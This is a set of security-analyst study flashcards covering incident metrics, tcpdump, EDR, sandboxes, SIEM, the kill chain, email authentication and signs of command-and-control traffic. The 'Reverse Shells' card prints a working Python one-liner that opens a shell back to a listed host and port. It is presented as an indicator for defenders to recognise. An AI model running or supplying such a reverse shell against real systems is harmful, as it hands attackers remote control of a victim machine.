One cannot overemphasize the importance of root cause analysis, which is foundational to understanding why an event occurred. On the surface, a computer may be infected with malware, but the root cause is much deeper. Why and how the computer was infected strikes at the center of the problem and may reveal user awareness issues, insufficient content filtering, ineffective patch management, improperly provisioned user accounts, or numerous other issues.
Term
Mean Time to Detect
Definition
A metric that measures the average time between the initial appearance of a security incident and its detection. It is an essential metric in security incident management as it can help organizations understand potential gaps in their response processes.
Term
Mean Time to Respond
Definition
A metric that measures the average time it takes to respond to an incident. It measures the speed and efficiency of response activities related to a detected event. For example, security software tools may detect an event quickly, but staff may not effectively respond to the alerts it generates.
Term
Mean Time to Remediate
Definition
A metric used to measure how quickly an organization can resolve an incident. MTTR is a valuable metric for evaluating an organization’s effectiveness in responding to and resolving incidents.
Term
Lessons learned
Definition
Sessions held at the end of a project or phase in which you discuss and document areas for improvement and capture lessons learned for use in future projects.
Lessons learneddescribe the practice of systematically capturing, analyzing and documenting the experience gained from managing and responding to security incidents, such as breaches, malware outbreaks, phishing attacks, or any similar issue that disrupts business operations or warrants incident response. The primary purpose of lessons learned in incident response is to foster a culture of continuous improvement and improve cyber resilience. By examining both successful and unsuccessful incident response actions, an organization can improve its ability to identify, detect, respond, and recover from future incidents.
Term
Wireshark
Definition
A widely used protocol analyzer.
Wireshark (wireshark.org) is an open-source graphical packet capture utility, with installer packages for most operating systems. Having chosen the interfaces to listen on, the output is displayed in a three-pane view, with the top pane showing each frame, the bottom-left pane showing the fields from the currently selected frame, and the bottom-right pane showing the raw data from the frame in hex and ASCII. Wireshark is capable of parsing (interpreting) the headers and payloads of hundreds of network protocols.
Term
tcpdump
Definition
tcpdump is a command line packet capture utility for Linux, though a version of the program called windump is available for Windows
Term
TCPDUMP SWITCHES
Definition
Switch
Usage
-n
Show addresses in numeric format (don't resolve host names).
-nn
Show address and ports in numeric format.
-e
Include the data link (Ethernet) header.
-v, -vv, -vvv
Increase the verbosity of output, to show more IP header fields, such as TTL.
-X
Capture the packet payload in hex and ASCII. Use -XX to include the data link header too.
-sBytes
By default, tcpdump captures the first 96 bytes of the data payload. To capture the full payload, set the snap length to zero with -s 0.
-wFile
Write the output to a file. Packet capture files are normally identified with a .pcap extension.
-r File
Display the contents of a packet capture file.
There are numerous filter options, which can be combined using logical and (&&), or (||), not (!), and groups (parentheses). Some basic filter keywords include the following:
Switch
Usage
host
Capture source and destination traffic from the specified IP or host name.
src / dst
Capture only source or destination traffic from the specified IP.
net
Capture traffic from the specified subnet (use CIDR notation).
port
Filter to the specified port (or range of ports, such as 21-1024). You can also use src port or dst port.
proto
Filter to a protocol, such as ip, ip6, arp, tcp, udp, or icmp.
Term
Endpoint detection and response (EDR)
Definition
A software agent that collects system data and logs for analysis by a monitoring system to provide early detection of threats.
. EDR solutions provide real-time and historical visibility into a breach, contain malware within a single host, and help facilitate remediation of the host to its original state.
. EDR solutions provide real-time and historical visibility into a breach, contain malware within a single host, and help facilitate remediation of the host to its original state.
EDR is a security strategy focused on the identification, tracking, and response to threats on endpoints, such as laptops, desktops, mobile devices, and servers. This differs from typical antivirus solutions focused solely on identifying and quarantining malware. EDR provides a timeline or report of events that typically extends beyond the initial infection or intrusion.
An EDR solution typically includes a centralized security monitoring platform, acquisition points, and a data analysis engine,
Term
Centralized Security Monitoring Platform
Endpoint detection and response (EDR)
Definition
Where data collected by the security solution is stored and analyzed.
Term
Endpoint Acquisitions Points
Endpoint detection and response (EDR)
Definition
These are the endpoints that the platform acquires data from, such as desktop computers, etc
Term
Data Analysis Engine
Endpoint detection and response (EDR)
Definition
This is where the data is analyzed and contextualized for real-time or historical decision-making.
Term
Advantages Offered by EDR Solutions
Definition
Detecting Malicious Activity—A key component of EDR is the advanced capability to detect and analyze malicious activity on endpoints, such as laptops, desktops, and mobile devices.
Improved Incident Response—Security teams can develop proactive measures by leveraging real-time incident response capabilities offered by the EDR solution. For example, an EDR can enable automation of response actions triggered by signs of malicious activity.
Proactive Prevention—EDR can help look for patterns and behaviors indicative of an imminent threat.
Risk Assessment—Real-time risk assessment capabilities help security teams identify and analyze risk levels associated with various incidents to craft appropriate responses better.
Incident Investigation—An incident investigation function of EDR allows security analysts to investigate incidents and accurately determine their root causes.
Term
EDR Platform Capabilities
Definition
Malware Detection—A malware detection tool will look for specific malicious behavior, such as running a specific file or DLL.
URL Filtering—URL filtering is used to block access to malicious URLs often associated with phishing attacks.
Honeypots—Honeypots are decoy systems or services that security teams set up to attract, monitor, and analyze malicious activity. They can help to block it before it causes any real damage to actual systems.
Monitoring—Monitoring tools allow an organization to track the activity of endpoints, such as system activity, application use, network activity, and firewall rules.
Orchestration—EDR tools can orchestrate the activities of other security tools in response to suspicious activity or specific event triggers.
Detect Emerging Threats—EDR tools can help organizations detect new types of attacks, such as zero-day vulnerabilities, by looking for new attack patterns on the network.
Term
Whois
Definition
Whois is a look-up service that provides information about a domain name or IP address. It queries domain registry databases for the name, address, email address, phone number, and other information about the person or entity associated with a domain name or IP address. This information is helpful in analysis, as many IP addresses and domain names are known to be malicious. Additionally, information regarding domain registration may reveal it was created very recently. New domains often indicate malware campaigns as popular Internet destinations and businesses registered their domain names many years ago.
Term
AbuseIPDB
Definition
AbuseIPDB (abuseipdb.com) is a very popular website used by analysts to investigate suspicious traffic. The site also provides an API for automation services to integrate with SOAR platforms. A security analyst can use AbuseIPDB to identify malicious network traffic or suspicious emails by submitting an IP address to the platform's database search tool. The analyst can review historical data on the IP address provided by the platform, including any reports of abuse or malicious activity. The analyst can also view the comments section to see if other users have reported similar activity from the same IP address. Additionally, an analyst can use an API to integrate AbuseIPDB data into security tools, such as a SOAR platform, allowing for real-time monitoring and automated remediation. For example, a SOAR runbook might include steps to send an IP address collected from a SIEM alert to AbuseIPDB and, based on the results, generate an updated IDS detection rule or update a firewall to block the newly identified malicious address.
Term
Strings command
Definition
The strings command extracts and displays viewable characters stored within a binary. Using the strings command helps to reveal different characteristics of a binary, including how it operates. This can be useful for locating unique sequences of characters for custom malware signature detection and how a binary is designed to work. Strings analysis can often reveal URLs and IP addresses used by the binary.
Term
VirusTotal
Definition
VirusTotal provides a free service designed to inspect files and URLs using over 70 antimalware scanners and domain blocklisting services. The website provides a comprehensive report describing any malicious content, including the type of malware, malware names provided by various antimalware vendors, indicators, file hashes, different file names observed in the wild, relationships to domains, IP addresses and files, behavioral characteristics, and community discussion. Information collected and generated by VirusTotal is shared and distributed to antimalware developers to help improve the effectiveness of their detection engines.
Term
Sandboxing
Definition
A computing environment that is isolated from a host system to guarantee that the environment runs in a controlled, secure fashion. Communication links between the sandbox and the host are usually completely prohibited so that malware or faulty software can be analyzed in isolation and without risk to the host.
Term
Joe Sandbox
CrowdStrike's Hybrid Analysis
cloud-based sandbox
Definition
Joe Sandbox is a malware analysis platform that inspects executable files, suspicious URLs, and many other features. It offers easy access to behavior analysis, signature detection, and sandboxing technology to identify and analyze malicious files in a safe and controlled environment. Joe Sandbox can analyze various file types, including executables, PDF documents, Office documents, binary files, and other formats. It provides detailed reports and visualizations to help analysts understand the behavior of malware, how it operates, what it communicates with, and the environmental changes it makes.
Term
Cuckoo Sandbox
(Free & open-source)
Definition
Cuckoo Sandbox(cuckoo.cert.ee) is an open-source malware analysis tool that allows security researchers to analyze and detect advanced malware threats. Like Joe Sandbox and CrowdStrike's Hybrid Analysis, Cuckoo Sandbox uses sandboxing technology to analyze suspicious files and monitor their behavior in a safe and controlled environment. However, Cuckoo Sandbox is free and open-source, so it can run on an organization's existing infrastructure and be customized as warranted. Cuckoo Sandbox has a large community of contributors who continuously develop new plugins and features to improve its capabilities, and it has gained broad adoption in recent years.
Term
CrowdStrike's Hybrid Analysis
Definition
CrowdStrike's Hybrid Analysis is a cloud-based, proprietary solution that combines automated and human intelligence to generate threat analysis reports. Crowdstrike also offers other products, such as Falcon Sandbox, that provide real-time threat intelligence and incident response capabilities, which are unavailable in Cuckoo Sandbox or Joe Sandbox. Cloud-based platforms like Joe Sandbox and Hybrid Analysis can access and share analysis results. This feature is a concern for some highly secure environments needing to maintain full control over their environments.
Term
SIEM Capabilities
Aggregation
Definition
Collect event and log data from multiple disparate systems and provide a single view from which to process all of the collected data.
Term
SIEM Capabilities
Correlation
Definition
The ability to link events across the entire enterprise architecture to form a more complete picture of important events.
Term
SIEM Capabilities
Alerting
Definition
SIEM can be configured to perform automated analysis of event data and generate alerts to notify analysts of specific conditions or event types.
Term
SIEM Capabilities
Visibility
Definition
SIEM typically provides dashboard-style views, enabling a single, simplified view for observing critical activity.
Term
SIEM Capabilities
Compliance
Definition
SIEM facilitates compliance by producing activity reports designed to meet governance and auditing requirements.
Term
SIEM Capabilities
Data retention
Definition
SIEM platforms have the capability to store historical data which is critical for deep event analysis, digital forensics, data retention, and compliance requirements.
Term
Reconnaissance
Definition
In this stage, the attacker discovers what they can about the target and the technologies in place. This phase may use passive information gathering and active scanning of the target network. This phase's desired outcome will be identifying one or more potential exploitable vulnerabilities. [image]
Term
Weaponization
Definition
The attacker identifies a method by which identified vulnerabilities can be exploited, often through "weaponized code," such as carefully crafted scripts, custom malware binaries, compromised websites, social engineering, and other methods.[image]
Term
Delivery
Definition
The attacker identifies a vector to transmit the weaponized code to the target environment, such as via an email attachment or on a USB drive. [image]
Term
Exploitation
Definition
This results in the weaponized code running on the target system. For example, a phishing email may trick the user into running the code, while a drive-by download would execute on a vulnerable system without user intervention. [image]
Term
Installation
Definition
This mechanism enables the weaponized code to run a remote access tool and achieve persistence on the target system.[image]
Term
Command and Control (C&C or C2)
Definition
The weaponized code establishes a reliable channel to a remote server used to manage the session and often downloads additional tools to help advance the attack. [image]
Term
Actions on Objectives
Definition
In this phase, the attacker typically uses the access they have achieved to covertly collect information from target systems and transfer it to a remote system (data exfiltration). An attacker may have other goals or motives, however. [image]
Term
Diamond Model of Intrusion Analysis
Definition
A framework for analyzing cybersecurity incidents. [image]
[image]Understand the Diamond Model of Intrusion Analysis
The Diamond Model of Intrusion Analysis is set out in a paper by Sergio Caltagirone, Andrew Pendergast, and Christopher Betz (activeresponse.org/wp-content/uploads/2013/07/diamond.pdf). The Diamond Model suggests a framework to analyze an intrusion event (E) by exploring the relationships among four core features: adversary, capability, infrastructure, and victim. These four features are represented by the four vertices of a diamond shape. Each event may also be described by meta-features, such as date/time, kill chain phase, result, and so on. Each feature is also assigned a confidence level (C), indicating data accuracy or the reliability of a conclusion or assumption assigned to the value by analysis.
[image]Description
The core features infrastructure and capability are connected by a horizontal diagonal of the diamond. The meta features of the intrusion event are listed as timestamp, phase, result, direction, methodology, and resources.
Intrusion event represented in the Diamond Model. (Image: Released to public domain by Sergio Caltagirone, Andrew Pendergast, and Christopher Betz [activeresponse.org/wp-content/uploads/2013/07/diamond.pdf].)
Each event is then defined by tuples, and additional information about each feature can be nested using the following format:
E = { {Adversary,Cadversary},
{Capability,Ccapability},
{Infrastructure,Cinfrastructure},
{Victim,Cvictim} = {
{IP,Cip},
{Port,Cport},
{Process,Cprocess}
},
{Timestamp,Ctimestamp},
{ ... }
}
The power of the model lies in the ability to pivot along the vertices of the diamond to produce a complete analysis and correlation of the IoCs that represent the event.
[image]Description
Diamond Model analytic pivoting example. (Image: Released to public domain by Sergio Caltagirone, Andrew Pendergast, and Christopher Betz [activeresponse.org/wp-content/uploads/2013/07/diamond.pdf].)
Adversary—This element represents the individual or group responsible for the intrusion. Adversaries can include nation-states, criminal organizations, hacktivists, or malicious insiders.
Infrastructure—This element refers to the tools and resources used by the adversary to carry out the intrusion. Tools include malware, exploit kits, command and control servers, and other types of network infrastructure.
Capability—This element describes the technical skills and aptitude of the adversary, such as their ability to craft advanced techniques to evade detection, exploit vulnerabilities, and persist on target systems.
Victim—The victim element represents the organization or individual the adversary has targeted, such as government agencies, businesses, or individuals. Victims vary in size, industry type, and defensive capabilities.
Term
Open Source Security Testing Methodology Manual (OSSTMM)
Definition
Developed by the Institute for Security and Open Methodologies (ISECOM), this manual outlines every area of an organization that needs testing and goes into details about how to conduct the relevant tests.
The Open Source Security Testing Methodology Manual (OSSTMM) is a framework that provides a comprehensive and structured approach to security testing. The OSSTMM covers various aspects of security testing, including operational, physical, and wireless security testing. It provides a standardized methodology for conducting security tests and assessing the effectiveness of security controls.
Term
Email Message Internet Header Analysis
Definition
An email's Internet header contains address information for the recipient and sender, plus details of the servers handling the message's transmission, using the fields set out in the Simple Mail Transfer Protocol (SMTP). When an email is created, the mail user agent (MUA) creates an initial header and forwards the message to a mail delivery agent (MDA). The MDA should check that the sender is authorized to issue messages from the domain. Assuming the email is not being delivered locally at the same domain, the MDA adds or amends its own header and then transmits the message to a message transfer agent (MTA). The MTA routes the message to the recipient, using DNS to locate the recipient's MTA, with the message passing via one or more additional MTAs, such as SMTP servers operated by ISPs or mail security gateways. Each MTA adds information to the header.
One element of email headers that is frequently exploited is the fact that there are three "sender" address fields:
Display from—The sender's email address. This is the field displayed by an email client as the "From" field. It is submitted using a From: header in the message body and officially designated RFC5322.From. This field can be populated by both a "friendly" name string and the email address in angle brackets. Some email clients suppress the display of the email address part. This is bad practice as it makes it hard for the user to identify the message's source. Frequently, adversaries will enter a trustworthy domain string in the first part, hoping that the mail client will display that rather than the actual address. Compare:
Friendly Guy<friendlyguy@isp.foo>
with:
friendlyguy@isp.foo<friendlyguy@xyz.foo>.
Envelope from—A return address for use if the email is rejected by the recipient MTA. The value of this field is submitted using the MAIL FROM SMTP command and is officially designated as RFC5321.MailFrom. The mail client normally hides this field. It can take various labels, including return-path.
Received from/by—A list of the MTAs that processed the email. Each MTA identifies itself and the server that sent the message. If an adversary is spoofing a domain, the true origin of the message is likely to be revealed by examining this list of servers. When starting a session with another SMTP server, a server identifies itself using the HELO/EHLO string.
Headers aren't exposed to the user by most email applications, which is why they're usually not a factor in an average user's judgment. You can view and copy headers from a mail client via a message properties/options/source command. MTAs can add a lot of information in each received header, such as the results of spam checking. If you use a plain text editor to view the header, it can be difficult to identify where each part begins and ends. Fortunately, plenty of tools are available to parse headers and display them in a more structured format. One example is the Message Analyzer tool, available as part of the Microsoft Remote Connectivity Analyzer (testconnectivity.microsoft.com). This will lay out the hops that the message took more clearly and break out the headers added by each MTA. You can also implement software that inspects headers and triggers an alert if the headers match known malicious values.
The following example shows the headers from a spam message. Some of the fields have been removed, and some of the original identifying information redacted and replaced with placeholders:
Received: from protection2.outlook.com (2603:10a6:208:ac::18) by exchangelabs.com with HTTPS ; Tue, 24 Dec 2019 19:30:08 +0000
Received: from protection1.outlook.com (10.152.16.53) by protection2.outlook.com (10.152.17.88) with Microsoft SMTP Server ; Tue, 24 Dec 2019 19:30:08 +0000
Authentication-Results: spf=none (sender IP is w.x.y.z) smtp.mailfrom=spam.foo; hotmail.com; dkim=none (message not signed) header.d=none;hotmail.com; dmarc=none action=none header.from=spam.foo;
Received-SPF: None (protection.outlook.com: spam.foo does not designate permitted sender hosts)
These fields show the receipt of the email by the recipient's mail gateway, which performs analysis on it. The sender's domain is identified as spam.foo.
Received: from openrelay.foo (w.x.y.z) by protection1.outlook.com (10.152.16.89) with Microsoft SMTP Server ; Tue, 24 Dec 2019 19:30:06 +0000
This field shows the SMTP server that originated the message. It comes from a different domain than spam.foo. The openrelay.foo domain and IP address is on many mail blacklists.
Subject: Your account is blocked by the administrator
The from and return-path fields list the same sender address, but note the attempt to disguise the nature of the sender by impersonating a Gmail account administrator.
X-MS-Exchange-Organization-Expiration StartTime: 24 Dec 2019 19:30:07.8963 (UTC)
The X- headers indicate custom headers that are controlled by the SMTP server administrator. They are often used for message authentication and spam analysis, in this case by Microsoft (docs.microsoft.com/en-us/microsoft-365/security/office-365-security/anti-spam-message-headers).
Term
Malicious Payload
A malicious payload is some sort of code implemented within the message body. There are two main types of malicious payload:
Definition
§Exploit—The message data contains scripts or objects that target some vulnerability in the mail client, such as incorrectly processing RTF or HTML-based messages, image files, or S/MIME digital signatures. In some cases, these may be activated via the email client's preview feature. It is important to keep email client applications up to date with the latest patches.
§Attachment—The message contains a file attachment in the hope that the user will execute or open it. The nature of the attachment might be disguised by formatting tricks such as using a double file extension (of the form file.pdf.exe).
Term
Embedded Links
Definition
As users are slightly less likely to open suspicious attachments these days, another popular vector is to embed a link to a malicious site within the email body. As with email sender addresses, a link can be composed of a friendly string plus the URL. Most mail applications should display the full URL of the link rather than just the friendly string, which can assist the user in diagnosing whether to trust it or not. However, the best advice is never to use links from email messages. Even if the user trusts the communication, they should still locate the site referred to manually via the browser.
It is also possible to construct links that will perform an exploit against some local vulnerability in the email client application or the underlying OS
Term
Email Signature Block
Definition
A missing or poorly formatted email signature block is an indicator for a phishing message. Conversely, spear phishing might have obtained samples of a company's signature block and constructed a convincing facsimile. This might be used to embed malicious links and incorrect or hacked contact details.
Term
Malicious Attachments
Definition
Emails can contain malicious attachments, such as malware executables hidden in a compressed file. File attachments should be scanned by antimalware at the email gateway and user desktop, or email client to locate and remove these files. Despite these best efforts, malicious file attachments are likely to still pass through undetected.
When investigating email attachments, it is crucial to obtain the hash of the attachment, as this can be used to identify the file uniquely. Comparing the hash to known malicious file hashes clearly identifies a match. Oftentimes, malicious file attachments are not detected by antimalware or groupware detection engines even after manual inspection validates the attachment as malicious. In this case, custom detection rules designed to use the file hash can locate any other instances of the malicious file in other mailboxes or anywhere else.
Term
hash
Definition
The theoretically indecipherable fixed-length output of the hashing process.
Term
Sender Policy Framework (SPF)
Definition
A DNS record identifying hosts authorized to send mail for the domain.
SPF is an important component to email analysis. When analyzing email headers, comparing the sender to what is listed in an SPF record can reveal whether the email is spoofed or requires further investigation.
Sender Policy Framework (SPF) is a DNS TXT record that identifies the hosts authorized to send emails for the domain. It is common for emails to be sent from different domains, for example, when a third party hosts an organization's email or when an organization uses a marketing service to send and collect customer survey information. IP addresses, CIDR address blocks, or hostnames identify the authorized mail servers. An SPF record can also help determine what to do with email originating from a location not listed in the record. Actions include rejecting them (-all), flagging them (~all), or accepting them (+all).
Term
DomainKeys Identified Mail (DKIM)
Definition
A cryptographic authentication mechanism for mail utilizing a public key published as a DNS record.
DomainKeys Identified Mail (DKIM) provides a cryptographic authentication mechanism for DNS records and supplements SPF. To configure DKIM, the organization uploads a public key as a TXT record in the DNS server. When outgoing email is processed, the domain MTA calculates a hash value on selected message headers and signs the hash using its private key. The hash value is added to the message as a DKIM signature, along with the sequence of headers used as inputs for the hash, the hash algorithm, and the selector record, to allow the receiving server to locate the correct DKIM DNS record.
DomainKeys Identified Mail (DKIM) provides a cryptographic authentication mechanism for DNS records and supplements SPF. To configure DKIM, the organization uploads a public key as a TXT record in the DNS server. When outgoing email is processed, the domain MTA calculates a hash value on selected message headers and signs the hash using its private key. The hash value is added to the message as a DKIM signature, along with the sequence of headers used as inputs for the hash, the hash algorithm, and the selector record, to allow the receiving server to locate the correct DKIM DNS record.
The receiving MTA looks up the DKIM DNS record, obtains the public key, and uses it to decrypt each hash. It calculates its own header hash and compares the two. If they match, the message origin has been successfully authenticated.
Term
Domain-based Message Authentication, Reporting, and Conformance (DMARC)
Definition
A framework for ensuring proper application of SPF and DKIM, utilizing a policy published as a DNS record
The Domain-based Message Authentication, Reporting, and Conformance (DMARC) framework ensures that SPF and DKIM are being utilized effectively. A DMARC policy is published as a DNS record. It specifies an alignment mechanism to verify that the domain identified in the rule header from field matches the domain in the envelope from field (return-path) in an SPF check and/or the domain component in a DKIM signature. DMARC can use either SPF or DKIM or both. DMARC specifies a more robust policy mechanism for senders to specify how DMARC authentication failures should be treated (flag, quarantine, or reject), plus mechanisms for recipients to report DMARC authentication failures to the sender. Recipients can submit an aggregate report of failure statistics and a forensic report of specific message failures.
Term
Cousin Domains
Definition
SPF, DKIM, and DMARC do not solve the problem of cousin or look-alike domains. These are domain names or domain name parts that closely resemble an organization's real domain. Phishers will also exploit the fact that many organizations use hosted email services, especially for business tasks like marketing and customer service and support ticketing. When official emails arrive from domains such as support@realcompany.serviceprovider.foo, it makes it much easier for a phisher to succeed with an impersonation attack using an email address such as support@reelcompany.serviceprovider.foo or support@realcompany.srviceprovider.foo.
Term
Important Linux Commands
Definition
Command
Description
ssh
Used to remotely access a server and obtain shell access for administrative purposes.
wget
Used to interact with a web server using a command line interface.
curl
Similar to wget but includes more functionality.
telnet
A cleartext protocol used to remotely access a server. Telnet has some well-known exploitable vulnerabilities.
ftp
A cleartext protocol used to perform file transfer. FTP has some well-known exploitable vulnerabilities.
arp or ss
Used to identify physical addresses of hosts.
ip or ifconfig
Used to identify and change network configuration information.
whoami
Used to identify the current session user. Often used after obtaining shell access to determine privilege levels.
netstat
Used to display network activity, in particular active IP addresses and ports.
Term
Important Windows Commands
Definition
Command
Description
netstat
Used to display network activity, in particular active IP addresses and ports.
ping
Used to test connectivity among network devices, can also be abused to carry data.
ipconfig
Used to display IP address configuration information.
nslookup
Used to interact with DNS using the command line.
tasklist
Used to display the processes running on a system.
net <option>
The net command is used to perform many administrative tasks.
netsh
Allows local and remote configuration of network-related services.
wmic
A command line interface to Windows Management Instrumentation (WMI).
Term
Important PowerShell Commands
Definition
Command
Description
Invoke-Request
Used to remotely issue commands to a Windows system.
Invoke-WebRequest
Used to interact with a system using HTTP or HTTPS.
DownloadString
Used to download information from a web server, such as a malicious script or payload.
Start-Process
Starts a new process, often to load malware or a rogue process.
Get-WMIObject
Used to collect information from a host using Windows Management Instrumentation (WMI).
Get-Process
Used to display processes configured on a system.
Term
Reverse Shells
Definition
Reverse shells are very popular as they consistently work even if a firewall is present. A reverse shell describes making a victim system connect back to the attacker's machine to establish shell access. The chart below lists specific examples of commands used when creating a reverse shell.
export RHOST="10.20.100.1";export RPORT=8181;python -c 'import socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/sh")'
Reverse shell commands are unlikely to represent normal activity. Any indication that one of the reverse shell commands has been used indicates suspicious activity and potential unauthorized access (potential because the reverse shell may not have worked to establish a shell).
The other commands listed for Windows, PowerShell, and Linux warrant further investigation as an engineer or administrator may have used them to troubleshoot a problem, reconfigure a service, obtain remote access for legitimate purposes, or complete a change request. The objective is to determine what scenario sufficiently explains why the commands were used. Even if an authorized employee used the commands, the reason they were used may not be justified and could indicate malicious intent or a failure to follow established policy.
Term
Abnormal Account Activity
Definition
Monitoring the use of user accounts is an effective way to identify suspicious activity.
Some examples include the following:
§A user account for an employee with well-defined working hours being used during the night
§A user account provisioned to only work on desktop computers being used on a server computer
§A user account created on a local computer or created by a user without authorization to create accounts
§An account being added to a group unexpectedly or added by an unauthorized individual
Term
impossible travel.
Definition
A tracking of information such as GPS address, IP address, or user's device to pinpoint a user's location and determine whether a behavior was physically possible.
An example of this would be a user account logging in from an IP address located in New York and then logging in again 15 minutes later from Brussels. This is suspicious because it is physically impossible to travel that distance in 15 minutes. Sometimes this type of event is normal, for example, if a user utilizes a VPN with overseas service locations.
Term
Abnormal Behavior and Patterns
Definition
Monitoring computer activity may also reveal other problematic activities or sequences of activities that match a known attack pattern such as the following:
§Evidence of communication with known malicious IP addresses or domain names
§Abnormal communication patterns such as encrypted communication between a device and a remote host every two minutes or abnormal protocol activity such as gigabytes of DNS traffic or ping requests that do not receive responses or have unusual packet sizes
§Evidence of traffic on ports associated with C&C traffic using encoded communications and commands
§Evidence that a user received an email with a suspicious link, visited the site, launched an executable, and established a connection to a system located on the Internet
Term
User and Entity Behavior Analytics (UEBA)
Definition
These products scan indicators from multiple intrusion detection and log sources to identify anomalies. They are often integrated with security information and event management (SIEM) platforms.
A user and entity behavior analytics (UEBA) solution supports identification of malicious behaviors from comparison to a baseline. As the name suggests, the analytics software tracks user account behavior across different devices and cloud services. Entity refers to machine accounts, such as client workstations or virtualized server instances, and to embedded hardware, such as Internet of Things (IoT) devices. The complexity of determining baselines and reducing false positives means that UEBA solutions are often heavily dependent on AI and machine learning.
Term
Distributed denial of service attack (DDoS attack)
Definition
An attack that uses multiple compromised hosts (a botnet) to overwhelm a service with requests or response traffic.
Term
traffic spike
Definition
A sharp increase in connection requests in comparison with a baseline.
Term
Bandwidth consumption
Definition
Bandwidth consumptiondescribes unusually high and possibly mysterious traffic volumes over a sustained period. Some traffic spikes and heavy utilization reflect regular activity, such as network-based backups, data replication, website traffic in response to a marketing campaign, and other similar scenarios.
§Worm activity is an issue which typically manifests as high volumes of traffic saturating switches and router interfaces.
§A reflection or amplification attack is another issue. In a reflection attack, the attacker spoofs the victim's IP address and uses the spoofed IP to communicate with multiple servers. The servers respond to the victim, overwhelming it with traffic.
§A DNS reflection attack allows a small DNS request with a spoofed source IP to generate a very large response. DNS reflection attacks are effective for generating bandwidth-busting traffic volumes while only requiring small requests from attackers or bots.
§The Network Time Protocol (NTP) monlist command can be abused to generate large traffic volumes. For example, a simple, small query for the last 600 machines contacted by the NTP server results in a large response (as well as exposing network hostnames). Like a DNS amplification attack, this characteristic allows a small request to generate a large response.
Term
DDoS Mitigation
Definition
Real-time analysis of log files to identify suspicious traffic and send it to a black hole or sinkhole is effective, especially if the response is automated. Geolocation and IP reputation analysis can also help identify and block suspicious traffic.
A popular and highly effective approach is implementing cloud-based protections for Internet-facing systems. Services like Cloudflare (cloudflare.com) and Imperva (imperva.com) inspect traffic before it reaches an organization's infrastructure. The organization's firewall is configured to allow traffic sourced from the cloud provider only. Public DNS records direct all requests to the cloud provider, where traffic is inspected and only passed to the organization's systems if legitimate.
Term
beaconing
Definition
A means for a network node to advertise its presence and establish a link with other nodes, such as the beacon management frame sent by an AP. Legitimate software and appliances do this, but it is also associated with Remote Access Trojans (RAT) communicating with a Command & Control server.
Term
Internet relay chat (IRC)
Definition
A group communications protocol that enables users to chat, send private messages, and share files.
IRC networks use discrete channels, representing individual forums used by clients to chat. With IRC, it is easy for an attacker to set up an IRC server and begin sending interactive control directives to individual bots connected to the IRC server. The use of IRC for C&C is less common than it once was. IRC traffic is easy to detect, and organizations should block it.
Term
HTTP and HTTPS
Definition
Communication using HTTP/HTTPS is necessary for almost every network, and blocking it is not feasible. HTTPS traffic makes it difficult to separate malicious traffic from legitimate traffic, so attackers frequently use it for C&C. Proxies can help mitigate this when configured to decrypt and inspect encrypted traffic. Other strategies include IP address and domain reputation checking, DNS blackholes, and certificate inspection (encrypted bot traffic often uses self-signed certificates).
Term
Domain Name System (DNS)
Definition
DNS traffic is often not inspected or filtered, and attackers use this as an opportunity to evade detection. DNS can operate as a C&C channel and is highly effective because the bot does not need direct Internet access. The bot uses a local DNS server that forwards lookups outside the organization, receiving a response with a control message. Attackers send commands as request or response queries, making them longer and more complicated than typical DNS traffic, which can be used as an indicator of compromise. Sometimes, attackers break control messages into several query fragments to avoid detection. Another sign of a C&C activity via DNS is when the same query is repeated several times; this indicates that the bot is checking the control server for commands.
Term
Social Media Websites
Definition
Facebook, Twitter, LinkedIn, and other social media sites have been vectors for C&C. Social media platforms like these allow attackers to issue commands through the platforms' messaging capability. For example, many organizations allow unrestricted LinkedIn traffic, which allows an attacker to issue commands to bots through an active account profile using fields like employment status, employment history, status updates, and others. Sometimes C&C can leverage hashtags to encode command strings used by bots. These attacks have become less prevalent as social media platforms incorporate controls to limit abuse.
Term
Media and Document Files
Definition
Media file formats like JPEG, MP3, and MPEG use metadata to describe images, audio, and video. An attacker can embed control messages inside this metadata, then send the media file to bots over any communication channels supporting media sharing. Monitoring systems do not typically inspect media metadata, allowing the attacker to evade detection.
Term
ARP spoofing, or ARP poisoning
Definition
A network-based attack where an attacker with access to the target local network segment redirects an IP address to the MAC address of a computer that is not the intended recipient. This can be used to perform a variety of attacks, including DoS, spoofing, and Man-in-the-Middle
Irregular peer-to-peer communication may also indicate various kinds of on-path attacks. ARP spoofing, or ARP poisoning, describes when an attacker redirects an IP address to a MAC address not associated with its proper destination. Attackers execute this spoofing attack by continuously sending cache update requests to the victim using erroneous address information. ARP always overwrites its records with the latest request, so flooding the cache with spoofed requests ensures it is corrupted. An IDS such as Snortor Suricataeffectively identifies suspicious traffic because ARP poisoning attacks generate much more ARP traffic than normal. The command arp -acan be used to manually inspect the local machine's ARP cache and verify that unique MAC address values are associated with each dynamic entry in the table.
Term
rogue device
Definition
An unauthorized device or service, such as a wireless access point DHCP server, or DNS server, on a corporate or private network that allows unauthorized individuals to connect to the network.
A rogue device is any unauthorized electronic equipment attached anywhere in an organization's environment. Examples include a USB storage device attached to a computer to copy sensitive data, an extra Wi-Fi adapter installed on an employee's workstation and used to establish a wireless hotspot, or an employee's personal, unsecured smartphone connected to the network. Rogue system detection refers to identifying (and removing) unauthorized devices.
Term
perform rogue machine detection:
Definition
§Visual inspection of ports/switches—Simply looking for out-of-place devices or odd cabling connections is very effective. Looking inside cabinets and under desks for tape-mounted Raspberry Pi and other microcomputers is very important.
§Network mapping/host discovery—Network scans can identify hosts and use banner grabbing and fingerprinting to collect valuable information. DHCP logs are also very helpful.
§Wirelessmonitoring—Discover unknown or unidentifiable service set identifiers (SSIDs) showing up within range of the office.
§Packetsniffingandtrafficflow—Reveal the use of unauthorized protocols on a network and suspicious peer-to-peer communication.
§NACandintrusiondetection—Security suites and appliances can combine automated network scanning with defense and remediation suites to prevent rogue devices from accessing the network.
Term
Protecting Against Rogue Devices
Definition
Rogue devices depend upon network access. By implementing port-based access controlor 802.1x network access control,unauthorized devices are much less likely to be able to gain network access. Additionally, implementing these controls can help make identifying rogue devices easier.
Term
Scan/Sweep Events
Definition
The initial stages of an attack often include network scans and ping sweeps to identify hosts and services on the network, including any exploitable vulnerabilities. The term scan can refer specifically to a port scan directed at a single host (also known as fingerprinting) to enumerate which ports are open and the software and firmware in use. A sweeprefers to probing a range of IP addresses to discover hosts.
